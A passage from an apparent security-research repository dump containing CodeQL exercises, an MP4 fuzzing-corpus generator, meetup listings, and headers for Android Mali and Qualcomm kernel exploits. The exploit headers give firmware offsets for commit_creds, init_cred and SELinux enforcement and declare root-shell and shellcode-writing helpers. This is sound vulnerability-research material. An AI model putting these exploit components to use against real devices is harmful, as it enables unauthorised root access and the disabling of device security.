  TargetFunction() { "amqp_pool_alloc_bytes" = this.getName() }
}
14 |
/**
 * Taint configuration: network bytes (`amqp_bytes_t.bytes` accesses) as
 * sources, arguments of `amqp_pool_alloc_bytes` calls as sinks. Any argument
 * position counts as a sink, not just the size.
 */
class Config extends TaintTracking::Configuration {
  Config() { this = "rabbitmq-c" }

  override predicate isSource(DataFlow::Node source) {
    exists(NetworkBytes nb | source.asExpr() = nb)
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(TargetFunction target |
      sink.asExpr() = target.getACallToThisFunction().getAnArgument()
    )
  }
}
27 |
// Source/sink pairs connected by the rabbitmq-c taint configuration.
from Config cfg, DataFlow::Node src, DataFlow::Node snk
where cfg.hasFlow(src, snk)
select src, snk
31 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Calls with a `sizeof` expression passed directly as an argument.
from FunctionCall c
where exists(SizeofOperator so | so = c.getAnArgument())
select c
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Calls with a `sizeof` anywhere inside an argument (e.g. `n * sizeof(x)`).
from FunctionCall c
where exists(SizeofOperator so | so = c.getAnArgument().getAChild*())
select c
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// kmalloc calls whose arguments contain a `sizeof`, with that sub-expression.
from FunctionCall c, Expr so
where
  so instanceof SizeofOperator and
  so = c.getAnArgument().getAChild*() and
  c.getTarget().getName() = "kmalloc"
select c, so
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex3.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// kmalloc calls that size the allocation with `sizeof(<pointer-typed expr>)`,
// a common mistake (`sizeof(p)` instead of `sizeof(*p)`).
from FunctionCall c, Expr so, Expr operand
where
  operand.getUnderlyingType() instanceof PointerType and
  operand = so.getChild(0) and
  so instanceof SizeofOperator and
  so = c.getAnArgument().getAChild*() and
  c.getTarget().getName() = "kmalloc"
select c, operand, operand.getUnderlyingType()
11 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex4.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// kmalloc calls and their size argument as a constant. Only sizes with a
// compile-time value have getValue(), so non-constant sizes yield no row.
from FunctionCall c, Expr sizeArg
where
  sizeArg = c.getArgument(0) and
  c.getTarget().getName() = "kmalloc"
select c, sizeArg, sizeArg.getValue().toInt()
8 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/types/ex5.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// kmalloc calls whose size argument is a multiplication, the usual shape of
// an allocation-size computation that can overflow.
from FunctionCall c, MulExpr sizeArg
where
  sizeArg = c.getArgument(0) and
  c.getTarget().getName() = "kmalloc"
select c, sizeArg
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Functions that access a variable named `current_task`.
from VariableAccess a
where "current_task" = a.getTarget().getName()
select a.getEnclosingFunction()
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Variables (of any kind) with "buffer" in their name.
from Variable v
where v.getName().matches("%buffer%")
select v
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Every local variable in the database.
from LocalVariable v
select v
5 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex3.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Every global or namespace-scope variable in the database.
from GlobalOrNamespaceVariable v
select v
5 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex4.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// All accesses to the global `current_task`.
from GlobalOrNamespaceVariable v, VariableAccess a
where a = v.getAnAccess() and v.getName() = "current_task"
select a
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex5.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Functions containing an access to the global `current_task`.
from GlobalOrNamespaceVariable v, VariableAccess a
where a = v.getAnAccess() and v.getName() = "current_task"
select a.getEnclosingFunction()
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/variables/ex6.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Each global/namespace variable with the number of places it is accessed
// (0 for variables that are declared but never used).
from GlobalOrNamespaceVariable v
select v, count(VariableAccess a | a = v.getAnAccess())
5 |
--------------------------------------------------------------------------------
/Conferences/2020/RootedCON/Presentacion.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Conferences/2020/RootedCON/Presentacion.pdf
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/README.md:
--------------------------------------------------------------------------------
1 | # MP4 corpus generator
2 | A generator of MP4 files to be used as a fuzzing corpus.
3 |
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/aux.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 | #include
5 | #include
6 |
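/// Returns a pseudo-random integer uniformly distributed in [min_value, max_value].
///
/// The engine is seeded once from std::random_device and kept in function-local
/// statics, so sequences are not reproducible between runs and the function is
/// not safe to call concurrently.
///
/// The distribution is typed on uint32_t so the whole 32-bit range is usable;
/// the previous `uniform_int_distribution<>` defaulted to int, which narrowed
/// both bounds and made ranges that do not fit a signed int undefined behaviour.
/// If min_value > max_value the bounds are swapped instead of being handed to
/// the distribution as an invalid range (also undefined behaviour).
inline uint32_t rand_uint32(uint32_t min_value, uint32_t max_value) {

    static std::random_device rd;
    static std::mt19937 gen(rd());

    if (min_value > max_value) {
        const uint32_t tmp = min_value;
        min_value = max_value;
        max_value = tmp;
    }

    std::uniform_int_distribution<uint32_t> dist(min_value, max_value);

    return dist(gen);
}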
20 |
21 |
/// Serialises `fourcc` as four bytes, least-significant byte first
/// (little-endian byte order); the result may contain NUL bytes.
inline std::string uint32_to_string(uint32_t fourcc){

    std::string output;
    output.reserve(4);

    for (int shift = 0; shift < 32; shift += 8) {
        output.push_back(static_cast<char>((fourcc >> shift) & 0xFF));
    }

    return output;
}
33 |
34 |
/// Serialises `fourcc` as four bytes, most-significant byte first
/// (big-endian / network byte order); the result may contain NUL bytes.
inline std::string uint32_to_string_BE(uint32_t fourcc){

    std::string output;
    output.reserve(4);

    for (int shift = 24; shift >= 0; shift -= 8) {
        output.push_back(static_cast<char>((fourcc >> shift) & 0xFF));
    }

    return output;
}
46 |
47 |
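/// Writes `content` verbatim (binary mode, embedded NULs preserved) to `file`,
/// truncating any existing file.
///
/// Returns false if the file cannot be opened OR if the write/flush fails
/// (e.g. disk full); the previous version returned true after a failed write.
inline bool write_to_file(const std::string &content, std::filesystem::path file){

    std::ofstream ofs(file, std::ios::out | std::ios::binary);

    if (!ofs) {
        return false;
    }

    ofs.write(content.data(), static_cast<std::streamsize>(content.size()));

    // close() flushes; a failure in either step sets failbit, which we report.
    ofs.close();

    return !ofs.fail();
}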
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/labeler/MP4.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 | #include
5 |
6 | #include
7 |
8 | #include "fourcc.h"
9 | #include "labeler.h"
10 |
11 |
// Labeler that, presumably, assigns MP4 box types (see fourcc.h) to the nodes
// of a RandomTree and serialises the result to a byte string.
// The tree is held by raw pointer and is not owned: no destructor is declared.
class MP4_labeler : public Labeler{

private:

    // Not owned; must outlive this labeler. NOTE(review): confirm callers never pass nullptr.
    RandomTree *tree;

    // Serialises `node` (and, presumably, its subtree); defined in labeler/MP4.cc.
    std::string traverse(Node &node);

public:

    MP4_labeler(RandomTree *in_tree);

    // Produces the complete file contents for the labelled tree.
    std::string serialize();
};
26 |
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/labeler/labeler.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 |
// Base class for strategies that assign string labels to the nodes of a
// RandomTree. It only carries a protected name and declares no virtual
// members, so subclasses (e.g. MP4_labeler) are not usable polymorphically
// through this type; in particular, deleting a subclass object through a
// Labeler* would be undefined behaviour (no virtual destructor).
class Labeler{

protected:

    std::string priv_name;

};
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/makefile:
--------------------------------------------------------------------------------
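# Build the MP4 corpus generator.
#
# CPPFLAGS is kept as the flag variable for backwards compatibility with
# existing invocations. -std=c++17 is required by the std::filesystem use in
# aux.h (older g++ releases default to an earlier standard).
CPPFLAGS = -g -O2 -std=c++17

SRC = tree.cc labeler/MP4.cc
INC = ./ ./labeler
# Derive the -I list from INC instead of repeating the directories by hand.
INCFLAGS = $(addprefix -I,$(INC))

.PHONY: all clean

all: generator

# Headers are not listed as prerequisites, so run `make clean` after editing one.
generator: main.cc $(SRC)
	g++ main.cc $(INCFLAGS) $(SRC) $(CPPFLAGS) -o generator

clean:
	rm -f generator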
10 |
--------------------------------------------------------------------------------
/Fuzzing/GStreamer/tree.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 | #include
5 |
6 | #include
7 |
// A node of a RandomTree: its position in the tree (id, parent, depth, children)
// plus a string label that a Labeler assigns afterwards.
//
// NOTE(review): the element types of the std::vector members are not visible in
// this rendering of the file; confirm against the real header.
class Node{

    // RandomTree fills in the private fields directly when building the tree.
    friend class RandomTree;

private:

    // -1 is the "unset" sentinel for id, parent_id and depth. parent_id is the
    // only one whose constructor parameter is signed, so -1 is presumably how
    // the root's missing parent is represented.
    int32_t id = -1;
    int32_t parent_id = -1;
    std::vector prv_children = {};
    int32_t depth = -1;

    // Payload written by set_label() and read by get_label().
    std::string label;


public:

    // NOTE(review): in_id and in_depth arrive as uint32_t but are stored in
    // int32_t fields, and get_id() hands the id back as uint32_t. Values of
    // 2^31 or more, and the -1 sentinel, change meaning on the way through;
    // confirm no caller depends on that.
    Node(uint32_t in_id, int32_t in_parent_id, uint32_t in_depth);

    // Read-only view of this node's children (ids or nodes: element type not visible here).
    const std::vector& children() const;

    std::string get_label() const;

    uint32_t get_id() const;

    void set_label(const std::string &in_label);

};
35 |
36 |
// A randomly shaped tree of `total_nodes` Node objects. Nodes are stored in
// `nodes` and also grouped by depth in `levels`.
//
// NOTE(review): the element types of the vector members are not visible in this
// rendering of the file; `levels` looks like a vector of vectors.
class RandomTree{

    // NOTE(review): friendship is not inherited, so this grants access to
    // Labeler only, not to subclasses such as MP4_labeler; confirm the
    // subclasses get by with the public API (get_node/size) or that this
    // declaration is actually needed.
    friend class Labeler;

private:

    std::vector nodes;

    std::vector> levels;

    uint32_t num_nodes = 0;

    uint32_t tree_depth = 0;

    // Creates a node under `parent_id` at `depth` and returns its id
    // (inferred from the signature; implementation is in tree.cc).
    uint32_t new_node(int32_t parent_id, uint32_t depth);

public:

    RandomTree(uint32_t total_nodes);


    // Mutable access by node id. Behaviour for an id >= size() is not visible here.
    Node & get_node(uint32_t node_id);

    size_t size() const;

    // Graphviz "dot" rendering of the tree, useful for eyeballing the generated shape.
    std::string dot_format() const;

};
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
1 | Copyright (c) 2019 GitHub, Inc.
2 |
3 | Permission is hereby granted, free of charge, to any person obtaining
4 | a copy of this software and associated documentation files (the
5 | "Software"), to deal in the Software without restriction, including
6 | without limitation the rights to use, copy, modify, merge, publish,
7 | distribute, sublicense, and/or sell copies of the Software, and to
8 | permit persons to whom the Software is furnished to do so, subject to
9 | the following conditions:
10 |
11 | The above copyright notice and this permission notice shall be
12 | included in all copies or substantial portions of the Software.
13 |
14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
15 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
16 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
17 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
18 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
19 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
20 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--------------------------------------------------------------------------------
/Meetup/2019-11/README.md:
--------------------------------------------------------------------------------
1 | # GitHub Security Lab Meet-Up
2 |
3 | - Newbie fuzzing gains: Getting the most of your iterations by @antonio-morales
4 | - OSS-Fuzz: 3 years of running an automated and continuous fuzzing service by Abhishek Arya
5 | - Using QL to find MIN_INT gotcha by @kevinbackhouse
6 | - Bug Hunting with CodeQL by @agustingianni
7 |
--------------------------------------------------------------------------------
/Meetup/2019-11/presentations/Bug hunting with CodeQL.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2019-11/presentations/Bug hunting with CodeQL.pdf
--------------------------------------------------------------------------------
/Meetup/2019-11/presentations/Newbie fuzzing gains.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2019-11/presentations/Newbie fuzzing gains.pdf
--------------------------------------------------------------------------------
/Meetup/2020-01/Breaking-SAML-dotNet-Edition.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-01/Breaking-SAML-dotNet-Edition.pdf
--------------------------------------------------------------------------------
/Meetup/2020-01/Hunting-Backdoors-in-Open-Source.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-01/Hunting-Backdoors-in-Open-Source.pdf
--------------------------------------------------------------------------------
/Meetup/2020-01/No-More-Whack-A-Mole.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-01/No-More-Whack-A-Mole.pdf
--------------------------------------------------------------------------------
/Meetup/2020-01/README.md:
--------------------------------------------------------------------------------
1 | # Presentations
2 |
3 | - James Forshaw - **Researching Local Windows RPC in PowerShell** _Live demo, no slides_
4 | - Alvaro Muñoz - **Breaking SAML (.NET Edition)**
5 | - Michael Scovetta - **Hunting Backdoors in Open Source**
6 | - Sam Lanning - **No more whack-a-mole**
7 |
--------------------------------------------------------------------------------
/Meetup/2020-04/Managing-content-security-and-samesite-cookies.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-04/Managing-content-security-and-samesite-cookies.pdf
--------------------------------------------------------------------------------
/Meetup/2020-04/README.md:
--------------------------------------------------------------------------------
1 | # Presentations
2 |
3 | - **Andrea Brancaleoni** - [InQL: GraphQL security testing made easy!](./inql.pdf)
4 | - **Stefan Edwards and Robert Tonic** - [Go-ing for an evening stroll](https://github.com/lojikil/kyoto-go-nihilism)
5 | - **Alyssa Miller** - [Security In the User Story, DevSecOps Compatible Threat Modeling](ThreatModelDevOps-GitHubSecMeetup.pdf)
6 | - **Neil Matatall** - [Managing content security policy and samesite cookies](Managing-content-security-and-samesite-cookies.pdf)
7 |
8 |
--------------------------------------------------------------------------------
/Meetup/2020-04/ThreatModelDevOps-GitHubSecMeetup.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-04/ThreatModelDevOps-GitHubSecMeetup.pdf
--------------------------------------------------------------------------------
/Meetup/2020-04/inql.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Meetup/2020-04/inql.pdf
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE-2025-0072/firmware_offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef FIRMWARE_OFFSETS_H
2 | #define FIRMWARE_OFFSETS_H
3 |
4 | #define AVC_DENY_2411 0x839c60
5 |
6 | #define SEL_READ_ENFORCE_2411 0x84bf40
7 |
8 | #define INIT_CRED_2411 0x280c948
9 |
10 | #define COMMIT_CREDS_2411 0x174f38
11 |
12 | #define ADD_COMMIT_2411 0x913ce108 //add x8, x8, #0xf38
13 |
14 | #define ADD_INIT_2411 0x91252000 //add x0, x0, #0x948
15 |
16 | #endif
17 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE-2025-0072/log_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef LOG_UTILS_H
2 | #define LOG_UTILS_H
3 |
4 | #ifdef SHELL
5 | #define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
6 | #else
7 | #include
8 | #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
9 | #endif
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE-2025-0072/mem_read_write.h:
--------------------------------------------------------------------------------
1 | #ifndef MEM_READ_WRITE_H
2 | #define MEM_READ_WRITE_H
3 |
4 | #include "CL/cl.h"
5 | #include "mali_kbase_ioctl.h"
6 | #include "mali_base_csf_kernel.h"
7 | #include "mali_base_kernel.h"
8 |
9 | #define KERNEL_BASE 0x80000000
10 |
11 | #define PAGE_SHIFT 12
12 |
13 | #define OVERWRITE_INDEX 256
14 |
/* Bundle of OpenCL handles used by the read/write helpers declared below:
 * write_to, read_from, write_func, cleanup and releaseKernel take a pointer
 * to it and create_rw_mem returns one by value. What each buffer holds is
 * not visible from this header - confirm against create_rw_mem. */
struct rw_mem_kernel {
cl_mem va;
cl_mem in_out;
cl_mem flag;
cl_kernel kernel;   /* compiled OpenCL kernel object */
cl_program program; /* program the kernel was built from */
};
22 |
23 | void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
24 |
25 | void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
26 |
27 | void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
28 |
29 | uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
30 |
31 | void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32);
32 |
33 | void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
34 |
35 | struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64);
36 |
37 | void releaseKernel(struct rw_mem_kernel* kernel);
38 |
39 | int run_enforce();
40 |
41 | #endif
42 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE-2025-0072/mempool_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef MEMPOOL_UTILS_H
2 | #define MEMPOOL_UTILS_H
3 |
4 | #include
5 | #include "mali_kbase_ioctl.h"
6 | #include "mali_base_csf_kernel.h"
7 | #include "mali_base_kernel.h"
8 | #include "log_utils.h"
9 |
10 | void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
11 |
12 | void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
13 |
14 | void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
15 |
16 | uint64_t drain_mem_pool(int mali_fd);
17 |
18 | void release_mem_pool(int mali_fd, uint64_t drain);
19 |
20 | #endif
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef LOG_UTILS_H
2 | #define LOG_UTILS_H
3 |
4 | #ifdef SHELL
5 | #define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
6 | #else
7 | #include
8 | #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
9 | #endif
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h:
--------------------------------------------------------------------------------
1 | #ifndef MEM_WRITE_H
2 | #define MEM_WRITE_H
3 |
4 | #include
5 | #include "mali.h"
6 | #include "mali_base_jm_kernel.h"
7 | #include "midgard.h"
8 | #include "log_utils.h"
9 |
10 | #define KERNEL_BASE 0x80000000
11 |
12 | #define PAGE_SHIFT 12
13 |
14 | #define OVERWRITE_INDEX 256
15 |
16 | void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
17 |
18 | void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
19 |
20 | void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type);
21 |
22 | uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number);
23 |
24 | uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number);
25 |
26 | int run_enforce();
27 | #endif
28 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef MEMPOOL_UTILS_H
2 | #define MEMPOOL_UTILS_H
3 |
4 | #include
5 | #include "mali.h"
6 | #include "mali_base_jm_kernel.h"
7 | #include "log_utils.h"
8 |
9 | void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
10 |
11 | void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
12 |
13 | void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
14 |
15 | uint64_t drain_mem_pool(int mali_fd);
16 |
17 | void release_mem_pool(int mali_fd, uint64_t drain);
18 |
19 | #endif
20 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef FIRMWARE_OFFSETS_H
2 | #define FIRMWARE_OFFSETS_H
3 |
4 | #define AVC_DENY_2311 0x806b50
5 |
6 | #define SEL_READ_ENFORCE_2311 0x818714
7 |
8 | #define INIT_CRED_2311 0x271bfa8
9 |
10 | #define COMMIT_CREDS_2311 0x167b40
11 |
12 | #define ADD_COMMIT_2311 0x912d0108 //add x8, x8, #0xb40
13 |
14 | #define ADD_INIT_2311 0x913ea000 //add x0, x0, #0xfa8
15 |
16 | #endif
17 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef LOG_UTILS_H
2 | #define LOG_UTILS_H
3 |
4 | #ifdef SHELL
5 | #define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
6 | #else
7 | #include
8 | #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
9 | #endif
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h:
--------------------------------------------------------------------------------
1 | #ifndef MEM_READ_WRITE_H
2 | #define MEM_READ_WRITE_H
3 |
4 | #include "CL/cl.h"
5 | #include "mali_kbase_ioctl.h"
6 | #include "mali_base_csf_kernel.h"
7 | #include "mali_base_kernel.h"
8 |
9 | #define KERNEL_BASE 0x80000000
10 |
11 | #define PAGE_SHIFT 12
12 |
13 | #define OVERWRITE_INDEX 256
14 |
/* Bundle of OpenCL handles used by the read/write helpers declared below:
 * write_to, read_from, write_func, cleanup and releaseKernel take a pointer
 * to it and create_rw_mem returns one by value. What each buffer holds is
 * not visible from this header - confirm against create_rw_mem. */
struct rw_mem_kernel {
cl_mem va;
cl_mem in_out;
cl_mem flag;
cl_kernel kernel;   /* compiled OpenCL kernel object */
cl_program program; /* program the kernel was built from */
};
22 |
23 | void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
24 |
25 | void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
26 |
27 | void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
28 |
29 | uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
30 |
31 | void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32);
32 |
33 | void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
34 |
35 | struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64);
36 |
37 | void releaseKernel(struct rw_mem_kernel* kernel);
38 |
39 | int run_enforce();
40 |
41 | #endif
42 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef MEMPOOL_UTILS_H
2 | #define MEMPOOL_UTILS_H
3 |
4 | #include
5 | #include "mali_kbase_ioctl.h"
6 | #include "mali_base_csf_kernel.h"
7 | #include "mali_base_kernel.h"
8 | #include "log_utils.h"
9 |
10 | void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
11 |
12 | void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
13 |
14 | void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
15 |
16 | uint64_t drain_mem_pool(int mali_fd);
17 |
18 | void release_mem_pool(int mali_fd, uint64_t drain);
19 |
20 | #endif
21 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/addr_utils.h:
--------------------------------------------------------------------------------
1 | #ifndef ADDR_UTILS
2 | #define ADDR_UTILS
3 |
4 | #define PHYS_TO_VIRT_OFF 0x8080000000ul
5 |
6 | #define VMEMMAP 0xfffffffefde00000ul
7 |
8 | #define KERNEL_PBASE 0xa0080000
9 |
10 | #define KERNEL_VBASE 0xffffffc010080000ul
11 |
12 | //_text - kernel physical base
13 | #define KERNEL_PHYS_OFF (KERNEL_VBASE - KERNEL_PBASE)
14 |
/* Round x down to the start of its 4 KiB page by clearing the low 12 bits. */
static inline uint64_t page_align(uint64_t x) {
    const uint64_t page_mask = ~((uint64_t)0xfff);
    return x & page_mask;
}
18 |
/* Translate a physical address to its kernel virtual address by subtracting
 * PHYS_TO_VIRT_OFF; this is the inverse of virt_to_phys_lm below. The
 * subtraction wraps modulo 2^64, which is relied upon for the high
 * kernel addresses. */
static inline uint64_t phys_to_virt(uint64_t x) {
    const uint64_t virt = x - PHYS_TO_VIRT_OFF;
    return virt;
}
22 |
/* Translate a kernel virtual address to physical, accepting only addresses
 * in the low-memory (linear) range. An address with bit 38 set is rejected
 * and terminates the process through err(). */
static inline uint64_t virt_to_phys_lm(uint64_t x) {
    const uint64_t high_bit = (uint64_t)1 << 38;
    if ((x & high_bit) != 0) {
        err(1, "address is not in low mem range.\n");
    }
    return x + PHYS_TO_VIRT_OFF;
}
27 |
/* Translate a kernel virtual address to physical. Bit 38 selects the
 * rebasing rule: set -> rebase by KERNEL_PHYS_OFF (KERNEL_VBASE - KERNEL_PBASE,
 * presumably the kernel image mapping); clear -> linear-map rule, the same
 * one virt_to_phys_lm applies. */
static inline uint64_t virt_to_phys(uint64_t x) {
    const int rebase_by_image = (x & ((uint64_t)1 << 38)) != 0;
    return rebase_by_image ? x - KERNEL_PHYS_OFF : x + PHYS_TO_VIRT_OFF;
}
32 |
/* Map a physical address to the address of its page descriptor: VMEMMAP is
 * treated as the base of an array of struct page, indexed by page frame
 * number with a stride of 64 bytes (the assumed sizeof(struct page) for
 * this kernel - TODO confirm). */
static inline uint64_t phys_to_page(uint64_t phys_addr) {
    const uint64_t pfn = phys_addr >> 12;
    const uint64_t page_struct_size = 64;
    return VMEMMAP + pfn * page_struct_size;
}
37 |
38 | #endif
39 |
--------------------------------------------------------------------------------
/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 | #include "cpu_utils.h"
11 |
/* Local stand-in for the libc cpu_set_t type and its CPU_SET / CPU_ZERO
 * helpers: a bitmask of CPU_SETSIZE bits stored in unsigned longs, passed
 * straight to the sched_setaffinity syscall by migrate_to_cpu below.
 * NOTE(review): presumably defined here because the toolchain's headers do
 * not provide them for this build - confirm before keeping the copy. */
#define CPU_SETSIZE 1024
#define __NCPUBITS (8 * sizeof (unsigned long))
typedef struct
{
unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
} cpu_set_t;

/* Set the bit for `cpu` in the mask. */
#define CPU_SET(cpu, cpusetp) \
